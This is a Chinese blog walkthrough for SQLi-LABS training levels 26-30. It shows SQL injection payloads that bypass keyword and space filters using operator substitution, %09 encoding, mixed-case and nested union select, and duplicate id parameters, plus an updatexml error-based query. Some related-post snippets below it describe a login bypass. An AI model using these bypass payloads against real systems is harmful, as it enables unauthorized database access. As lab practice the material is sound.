SQLi-LABS通关攻略【26-30关】

最新推荐文章于 2024-08-27 15:51:22 发布
最新推荐文章于 2024-08-27 15:51:22 发布
阅读量541 收藏 14
点赞数 18
分类专栏: SQLi-LABS通关攻略 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65852138/article/details/141527701
版权

SQLi-LABS 26关

1.26关在进行常规测试时,发现有些字符过滤了,查看源码 发现确实如此

这些字符全被过滤了,包括and、or还有空格

所以我我们这里进行相应的替换

and:&&

or:||

2.再次进行闭合测试

?id=1' || '1'='1   回显正常

所以是'闭合

 

3.我们使用报错注入

当然,这里的报错语句中的字符也要进行相应的替换

使用语句:
?id=1' || updatexml(1,concat(1,database()),1) || '1'='1

SQLi-LABS 27关

1. 27关过滤了select和union,还有空格,所以我们使用相应的字符进行替代

使用大小写替换个别字母进行绕过

使用%09替换空格

查找回显点

发现只有一个1回显点,但是进行数据库名查询时,查不出来,因为过滤空格,所以不能将前面的id=1改为-1,因为,‘‘-’’会被过滤,所以只能改成一个不存在的数,还要是正的,这里改为999

?id=1'%09uNion%09seLect%091,2,3%09and%09'1'='1      //回显只有一个,且不能进行查询

?id=999'%09uNion%09seLect%091,2,3%09and%09'1'='1  //得到两个回显点,2处可以进行查询

 

2.使用联合查询进行数据库名查询

?id=999'%09uNion%09seLect%091,database(),3%09and%09'1'='1

SQLi-LABS 28关

1. 28关也是过滤,通过查看源代码得到其过滤的时union select整个语句,所以我们就不能正常使用联合查询语句,我们这里选择使用嵌套关键词方法,就是在union select中嵌套一个union select

具体写法就是:

ununion selection select  //将union里面嵌套一个union select,这样过滤之后就还是union select

2.现在进行闭合判断

?id=1' and '1'='1       //回显成功

?id=1') and '1'='1     //尝试是否有),回显错误

?id=1') and ('1'='1    //回显正常,说明有)

所以时')闭合方式

 

3.进行联合查询

?id=999')%09ununion%09selection%09select%091,2,3%09and%09('1'='1

 

SQLi-LABS 29关

1.29关它说有防火墙,查看源代码(login.php)发现是需要两个参数,代码在对参数值进行校验之前的提取时候只提取了第一个id值,如果我们有两个id参数,第一个id参数正常数字,第二个id参数进行sql注入。

2.闭合方式测试

?id=1&id=2' and '1'='1       //回显成功

?id=1&id=2') and '1'='1     //尝试是否有),回显错误

?id=1&id=2') and ('1'='1    //回显错误,说明没有)

所以时 ' 闭合方式

 

 

3.使用联合查询进行数据库名查询

?id=1&id=-2' union select 1,database(),3 and '1'='1

SQLi-LABS 30关

1.30关和29关一样,只是闭合方式变为了双引号

?id=-1" union select 1,database(),3--+

可以和29关使用一样的方式,也可以使用最常规的联合查询,同样别的,29关也适用此方式

Zhong-Xin
关注
  • 18
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1293
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 597
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs通关攻略(全卡)(更新中~)
C233333235的博客
07-22 508
7.然后就要进行表名的查询,此处在2的位置用group_concat(table_name),3 from information_schema.tables where table_schema='security'语句进行查询,group_concat的作用是将查询出的表名显示到一行,不然只能显示第一个表名。(别忘了在参数1前面加-,主要是为了使参数变为一个不存在的参数,任何过大的数字或负数,以及小数,科学计数法数字都可以),在这里确定其回显位置为2和3。1.打开卡,提示我们将参数id填入url中。
Sqli-labs通关手册【1-30
李安北的博客
05-03 7305
1.sql注入的原理 1)sql注入的原因 语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后在运行时直接由使用该语言的计算机执行这些指令。 例如:在与用户交互的程序中,用户的输入拼接到SQL语句中,执行了与原定计划不同的行为,从而产生了SQL注入漏洞。 2)登录案例讲解 主要是万能密码:登录SQL语句:select * from admin where username = ‘用户输入的用户名’
sqli-labs通关(1-20)
weixin_57827781的博客
05-18 1514
较为详细的介绍了sqli-labs靶场的操作以及实验过程,更好的学习sql注入
sqli-labs通关教程
m0_65150886的博客
01-23 1537
id=1返回正常页面?id=1'显示sql语句有误?id=1''页面返回正常,证明是字符型注入。因为该页面存在回显,所以我们可以使用联合查询。
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1700
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs-master超详细通关教程(1-23基础篇)
m0_67391270的博客
06-12 3188
一到四主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
MySQL知识笔记
weixin_68929783的博客
08-23 1441
以上是根据 B 站黑马课程学习后的 MySQL 笔记,为了日后复习和给别人参考而整理,希望对大家有所帮助。同时,在实际应用中,还需要根据具体情况合理使用索引、约束等功能,以提高数据库的性能和数据的完整性。
redis能正常访问,但是springboot编译报错
生而为人我很抱歉
08-27 147
因为你在自定义的 @Configuration 类中没有明确指定配置属性的绑定,或者这个类的加载顺序影响了 Spring Boot 的属性绑定过程。你可以尝试在 MyConf 类上加上 @Order 注解来调整加载顺序,或者确保 MyConf 类不会干扰到 Redis 配置的加载。你可以在 MyConf 类上使用 @ConditionalOnProperty 注解,确保在特定条件下才加载这个配置类,以避免在 Redis 配置加载之前进行不必要的初始化。
汉服文化平台网站
heye0910032的博客
08-26 325
本文主要探讨了使用Java语言开发汉服文化平台网站的全过程。系统采用B/S架构,严格遵循软件开发流程,从分析、设计到实现,确保了项目的系统性和科学性。系统主要面向管理员和用户两大类使用者,提供了包括首页、个人中心、汉服知识管理、服装展示管理、用户相册管理、论坛交流、系统管理、订单管理等功能。本系统的应用,旨在实现汉服文化信息管理的信息化,提高管理效率,方便用户访问和交流。通过本毕业设计,我深入学习并实践了Java语言和SSM框架在Web开发中的应用。
修复数据库中的 “Access Denied: SUPER Privilege Required” 错误
xiaochong0302的博客
08-26 249
当您使用数据库时,您可能会看到错误消息:“Access denied; you need (at least one of) the SUPER privilege(s) for this operation”。当您的数据库用户没有足够的权限来执行某些操作时,就会发生这种情况。
python12 中,No module named‘distutils‘错误
qq_43557600的博客
08-27 97
python12 “ No module named'distutils' ”,​ 安装 pip install setuptools ,解决 ​
(1)Hilt的基本概念和使用
最新发布
challenge51all的专栏
08-27 278
Jetpack Hilt 是一个强大的依赖注入框架,它简化了 Android 应用中的依赖管理,提高了代码的可维护性和可测试性。通过使用注解和模块,开发人员可以轻松地管理应用中的依赖系,并在不同的组件之间共享和注入依赖。在应用的 Application 类上使用这个注解,告诉 Hilt 这是一个使用 Hilt 进行依赖注入的应用。Jetpack Hilt 是一个用于 Android 的依赖注入框架,它建立在 Dagger 的基础上,旨在简化 Android 应用中的依赖注入过程。
笔记redis
风止的博客
08-22 1101
Redis(Remote Dictionary Server)是用C语言开发的一个基于的数据库
2019 下午 CLI举例:通过ISAKMP方式建立GRE over IPsec隧道
qq_25467441的博客
08-23 248
http://127.0.0.1:51299/icslite/hdx.do?docid=HDXAZN01177_03_zh#topicid=ZH-CN_TASK_0000001555595308
linux上datax 安装以及使用
寂夜了无痕的博客
08-24 984
linux上datax 安装以及使用
sqli-labs通关28
03-05
sqli-labs是一个用于学习和练习SQL入的实验平台。通关28其中的一个卡,下面是sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在URL中可以看到登录请求的参数,例如:`http://localhost/sqli-labs/Less-28/?id=1&Submit=Submit#`。 4. 在URL中的`id`参数处存在SQL注入漏洞,我们可以尝试利用这个漏洞进行攻击。 5. 输入`' or '1'='1`作为`id`参数的值,然后点击提交按钮。 6. 如果成功利用了SQL注入漏洞,你将会被认为是管理员身份登录成功,并且可以看到管理员的相信息。 请注意,sqli-labs是一个用于学习和练习SQL注入的平台,仅供合法目的使用。在实际应用中,SQL注入是一种严重的安全漏洞,需要谨慎对待。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值